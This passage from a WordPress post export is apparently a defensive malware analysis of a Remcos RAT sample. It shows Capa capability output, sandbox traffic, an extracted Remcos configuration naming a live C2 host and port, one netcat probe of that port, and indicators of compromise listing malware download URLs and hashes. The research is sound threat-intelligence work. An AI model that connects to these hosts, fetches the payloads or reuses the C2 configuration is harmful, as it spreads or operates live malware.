loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1628\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-1024x389.png\" alt=\"\" width=\"900\" height=\"342\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-1024x389.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-300x114.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-768x292.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-1536x583.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-2048x778.png 2048w, 
https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/MsqBIbY-150x57.png 150w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>With the other binary downloaded from the\u00a0<strong>paste.ee<\/strong> URL, I did not see anything there unfortunately within dnSpy. I did run it through <a href=\"https:\/\/github.com\/mandiant\/capa\" target=\"_blank\" rel=\"noopener\">Capa<\/a> and got the following back from it.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nCapability Namespace \r\n==========================\r\ncheck for software breakpoints - anti-analysis\/anti-debugging\/debugger-detection \r\nself delete - anti-analysis\/anti-forensic\/self-deletion \r\nget geographical location - collection \r\ngather firefox profile information (2 matches) - collection\/browser \r\nlog keystrokes via application hook (2 matches) - collection\/keylog \r\nlog keystrokes via polling (3 matches) - collection\/keylog \r\ncapture microphone audio (4 matches) - collection\/microphone \r\ncapture screenshot - collection\/screenshot \r\nreceive data (7 matches) - communication \r\nsend data (2 matches) - communication \r\ncreate reverse shell - communication\/c2\/shell \r\nexecute shell command and capture output - communication\/c2\/shell \r\nresolve DNS - communication\/dns \r\ncreate two anonymous pipes - communication\/named-pipe\/create \r\ninitialize Winsock library - communication\/socket \r\nencode data using Base64 - data-manipulation\/encoding\/base64 \r\nencode data using XOR (16 matches) - data-manipulation\/encoding\/xor \r\nencrypt data using AES (3 matches) - data-manipulation\/encryption\/aes \r\nreference AES constants - data-manipulation\/encryption\/aes \r\nencrypt data using OpenSSL ECDSA - data-manipulation\/encryption\/ecdsa \r\nencrypt data using RC4 KSA - data-manipulation\/encryption\/rc4 \r\nencrypt data using RC4 PRGA - 
data-manipulation\/encryption\/rc4 \r\nhash data using SHA256 (2 matches) - data-manipulation\/hashing\/sha256 \r\nauthenticate HMAC - data-manipulation\/hmac \r\ngenerate random numbers via WinAPI - data-manipulation\/prng \r\ncontain a thread local storage (.tls) section - executable\/pe\/section\/tls \r\nextract resource via kernel32 functions - executable\/resource \r\nread clipboard data (5 matches) - host-interaction\/clipboard \r\nwrite clipboard data (2 matches) - host-interaction\/clipboard \r\nquery environment variable - host-interaction\/environment-variable \r\nset environment variable (2 matches) - host-interaction\/environment-variable \r\nget common file path (2 matches) - host-interaction\/file-system \r\ncopy file - host-interaction\/file-system\/copy \r\ncreate directory (5 matches) - host-interaction\/file-system\/create \r\ndelete directory (3 matches) - host-interaction\/file-system\/delete \r\ndelete file (15 matches) - host-interaction\/file-system\/delete \r\ncheck if file exists (16 matches) - host-interaction\/file-system\/exists \r\nenumerate files recursively (3 matches) - host-interaction\/file-system\/files\/list \r\nget file attributes (2 matches) - host-interaction\/file-system\/meta \r\nset file attributes (10 matches) - host-interaction\/file-system\/meta \r\nmove file (2 matches) - host-interaction\/file-system\/move \r\nread file on Windows (4 matches) - host-interaction\/file-system\/read \r\nread file via mapping - host-interaction\/file-system\/read \r\nwrite file on Windows (6 matches) - host-interaction\/file-system\/write \r\nenumerate gui resources - host-interaction\/gui \r\nchange the wallpaper - host-interaction\/gui\/session \r\nget graphical window text (4 matches) - host-interaction\/gui\/window\/get-text \r\nhide graphical window (7 matches) - host-interaction\/gui\/window\/hide \r\nget keyboard layout (2 matches) - host-interaction\/hardware\/keyboard \r\nenumerate disk volumes - 
host-interaction\/hardware\/storage \r\nget disk information (3 matches) - host-interaction\/hardware\/storage \r\ncheck mutex - host-interaction\/mutex \r\ncheck mutex and exit (3 matches) - host-interaction\/mutex \r\nshutdown system (2 matches) - host-interaction\/os \r\nget system information on Windows - host-interaction\/os\/info \r\ncreate process on Windows (16 matches) - host-interaction\/process\/create \r\nuse process replacement - host-interaction\/process\/inject \r\nenumerate processes (2 matches) - host-interaction\/process\/list \r\nmodify access privileges - host-interaction\/process\/modify \r\nterminate process (14 matches) - host-interaction\/process\/terminate \r\nquery or enumerate registry key (2 matches) - host-interaction\/registry \r\nquery or enumerate registry value (7 matches) - host-interaction\/registry \r\nset registry value (7 matches) - host-interaction\/registry\/create \r\ndelete registry key (2 matches) - host-interaction\/registry\/delete \r\ndelete registry value - host-interaction\/registry\/delete \r\ncontinue service - host-interaction\/service \r\npause service - host-interaction\/service \r\nquery service status - host-interaction\/service \r\nenumerate services - host-interaction\/service\/list \r\nmodify service - host-interaction\/service\/modify \r\nstart service (2 matches) - host-interaction\/service\/start \r\nstop service (2 matches) - host-interaction\/service\/stop \r\nget session user name - host-interaction\/session \r\nget installed programs - host-interaction\/software \r\ncreate thread (22 matches) - host-interaction\/thread\/create \r\nterminate thread (2 matches) - host-interaction\/thread\/terminate \r\nbypass UAC via ICMLuaUtil - host-interaction\/uac\/bypass \r\nlink many functions at runtime (2 matches) - linking\/runtime-linking \r\nlinked against CPP standard library - linking\/static \r\nenumerate PE sections - load-code\/pe \r\nparse PE header (2 matches) - load-code\/pe \r\nresolve function by 
parsing PE exports (6 matches) - load-code\/pe \r\npersist via Run registry key (4 matches) - persistence\/registry\/run\r\n<\/pre>\n<p>I exported these files and have included them in the <a href=\"https:\/\/github.com\/herbiezimmerman\/2024-01-14-Remcos-RAT\" target=\"_blank\" rel=\"noopener\">Github repo<\/a> for this investigation for anyone that wants to take a crack at them.<\/p>\n<h4>Host Analysis<br \/>\n=============<\/h4>\n<p>Now that the files have been obtained and I have a good idea of what is going on via the script and what to look for, it was time to see what happened when actually running it in my VM and what happened at the network layer.<\/p>\n<p>The first attempt was done using the script as that seemed like the path of least resistance. Unfortunately this was not the case and the script bombed out. Looking at Wireshark I could see the calls made by the script to the two URLs, but I ended up getting a reset back from the hosts (not shown here) which was the end of that.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1629\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-1024x291.png\" alt=\"\" width=\"900\" height=\"256\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-1024x291.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-300x85.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-768x218.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-1536x436.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-2048x582.png 2048w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark1-150x43.png 150w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a>For grins, I thought that I would look at <em>Conversations<\/em> within Wireshark to see if 
any &#8220;odd&#8221; ports may have been used. Nope, nada.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1630\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2-1024x357.png\" alt=\"\" width=\"900\" height=\"314\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2-1024x357.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2-300x105.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2-768x268.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2-150x52.png 150w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark2.png 1296w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>Next up was running the binary files themselves starting with the binary from <strong>pasteio.com<\/strong>. As soon as I executed the file, MS AV popped up and let me know that it had stopped the execution of something bad even though MAV was disabled for real-time scanning. 
Looking at ProcMon and filtering for any <strong>created<\/strong> or\u00a0<strong>ended<\/strong> processes I could see that as soon as it was created it ended.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1631\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon-1024x325.png\" alt=\"\" width=\"900\" height=\"286\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon-1024x325.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon-300x95.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon-768x243.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon-1536x487.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon-150x48.png 150w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon.png 1814w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>Looking at Wireshark this time gave me a small surprise &#8211; two outbound calls for the following domains not seen before:<\/p>\n<ul>\n<li>rds[.]accesscam[.]org \/ 185.174.101.214<\/li>\n<li>geoplugin.net\/json.gp which returned info on the IP address seen from the VM<\/li>\n<\/ul>\n<p>Taking this and cross-referencing against Sysmon logs I was able to validate that the binary from pasteio.com made the calls.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1632\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-1024x386.png\" alt=\"\" width=\"900\" height=\"339\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-1024x386.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-300x113.png 300w, 
https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-768x289.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-1536x579.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-2048x771.png 2048w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark3-150x56.png 150w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>Since I didn&#8217;t get much from the pasteio.exe binary, I switched to the binary from the <strong>paste.ee<\/strong> domain and ran that. This time the activity within the VM was much more promising. I got the same call-outs to the two domains listed above, but also a small stream of traffic to the rds[.]accesscam[.]org domain (178[.]237[.]33[.]50) on port 6620, as seen in the conversations below.<\/p>\n<p><strong>Note: <\/strong>As an aside, port 6620 looks to be related to <span class=\"s1\">tcp\/kftp-data.\u00a0<\/span><\/p>\n<p>The only thing I can assume at the network level is that the communication between the VM and port 6620 is dormant and nothing is really going on (almost like a heartbeat), with the VM waiting for commands from the server. I also checked both <a href=\"https:\/\/www.shodan.io\/host\/184.174.101.214\" target=\"_blank\" rel=\"noopener\">Shodan<\/a> and <a href=\"https:\/\/search.censys.io\/hosts\/185.174.101.214\" target=\"_blank\" rel=\"noopener\">Censys<\/a> to see if this port had been observed at either place, and neither had any information about it. Granted, using netcat (nc -v rdm.accesscam.org 6620) from a terminal told me that I had connected successfully. 
So who knows.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1633\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-1024x290.png\" alt=\"\" width=\"900\" height=\"255\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-1024x290.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-300x85.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-768x217.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-1536x434.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-2048x579.png 2048w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/wireshark4-150x42.png 150w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>Now considering the binary did not need to use the process hollowing technique to run on the system, the persistence mechanism was not created. 
When doing a quick scan of the registry and filesystem for anything modified\/created by the process, the only thing that I saw was the binary playing with the registry and NOTHING on the filesystem:<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1634\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1-1024x208.png\" alt=\"\" width=\"900\" height=\"183\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1-1024x208.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1-300x61.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1-768x156.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1-150x30.png 150w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/procmon1.png 1435w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a><\/p>\n<p>Looking at the Sysmon events again, I did not see anything else that stood out beyond what I mentioned above.<\/p>\n<p>The last thing that I wanted to attempt was to pull the config out of the binary, since based on others&#8217; work (i.e. <a href=\"https:\/\/twitter.com\/CyberRaiju\" target=\"_blank\" rel=\"noopener\">Jai<\/a>&#8216;s most excellent post about this very thing, which can be read <a href=\"https:\/\/www.jaiminton.com\/reverse-engineering\/remcos\" target=\"_blank\" rel=\"noopener\">here<\/a>) it looked pretty easy to do. 
In this case it took a couple of tries (which I am still not sure how I messed up since the working one looked like the others), but I did finally manage to pull it out.<\/p>\n<p><a href=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-large wp-image-1638\" src=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-1024x367.png\" alt=\"\" width=\"900\" height=\"323\" srcset=\"https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-1024x367.png 1024w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-300x107.png 300w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-768x275.png 768w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-1536x550.png 1536w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-2048x733.png 2048w, https:\/\/www.herbiez.com\/wp-content\/uploads\/2024\/01\/remcos_config-150x54.png 150w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/a>I have also cleaned up the config file a bit for ease of copy\/pasta.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\r\nC2 Host: rdm.accesscam.org\r\nPort: 6620\r\nPassword: 1\r\nBotnet: Hpp\r\nMutex: Rmc-NAGSJO\r\n\r\nrdm.accesscam.org:6620:1|Hpp|1|1|100000||8|remcos.exe|0|Rmc-NAGSJO|0|8|logs.dat|10|5|6|Screenshots|5|MicRecords||0|0|0|1|Remcos|remcos|5722EFB615BBED358FD19DBBAECDA904\r\n\r\n<\/pre>\n<h4>IOCs<br \/>\n=====<\/h4>\n<p>URL: hxxps:\/\/hidrive[.]ionos.com\/lnk\/SBBJoDne#file [VT] [URLHaus]<br \/>\nURL: hxxps:\/\/textbin[.]net\/raw\/ezjmofz3s6 &#8211; [<a href=\"https:\/\/www.virustotal.com\/gui\/domain\/rdm.accesscam.org\" target=\"_blank\" rel=\"noopener\">VT<\/a>] [<a href=\"https:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Ftextbin.net%2Fraw%2Fezjmofz3s6\" 
target=\"_blank\" rel=\"noopener\">URLHaus<\/a>]<br \/>\nURL: hxxps:\/\/pasteio[.]com\/download\/xNVOEKuDyLXR [VT] [URLHaus]<br \/>\nURL: hxxps:\/\/paste[.]ee\/d\/WRBwK\/0 [<a href=\"https:\/\/www.virustotal.com\/gui\/url\/75cb82268219ffdc190d92b9ea6e0c4bf8a67e9590d9669ff50e6be0c9e7a03f\" target=\"_blank\" rel=\"noopener\">VT<\/a>] [URLHaus]<br \/>\nDomain: rdm[.]accesscam[.]org:6620 [<a href=\"https:\/\/www.virustotal.com\/gui\/domain\/rdm.accesscam.org\" target=\"_blank\" rel=\"noopener\">VT<\/a>] [URLHaus]<br \/>\nURL: geoplugin[.]net\/json.gp [VT] [URLHaus]<br \/>\nIP: 185[.]174[.]101[.]214 [<a href=\"https:\/\/www.virustotal.com\/gui\/ip-address\/185.174.101.214\" target=\"_blank\" rel=\"noopener\">VT<\/a>] [URLHaus]<br \/>\nScanned-2023Reports.vbs: b116f7ca8259e5ea9a53651a84d32ade6cb96c24a97f5d8f7eb6cb6e95a771f<br \/>\npaste.ee.exe: 288a045071388145c559b70d4fc7ff27baae2a3fda629d88a5da8e47ad9ee1ae [<a href=\"https:\/\/www.virustotal.com\/gui\/file\/288a045071388145c559b70d4fc7ff27baae2a3fda629d88a5da8e47ad9ee1ae\" target=\"_blank\" rel=\"noopener\">VT<\/a>]<br \/>\npasteio.com.exe: c92b586ab278e4d0390629f9039182d9d012e49605db44fb90db56951693a1be<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Summary ========= The last time I &#8220;published&#8221; anything was about a 1.8 years or so ago. So in the spirit of New Years resolutions to myself it really has come time for me to get back on the horse and get back into some sort of posting again. So let&#8217;s jump into an alert that I came across for what looks to be Remcos RAT. Link to the artifacts from this investigation can be found over at my Github here which also includes the output from the two URLs seen in the VB script. 
The memory dump of the Remcos&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1614\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[21,24,20],"class_list":["post-1614","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-rat","tag-remcos","tag-remcos-rat"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1614","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1614"}],"version-history":[{"count":14,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1614\/revisions"}],"predecessor-version":[{"id":1653,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1614\/revisions\/1653"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}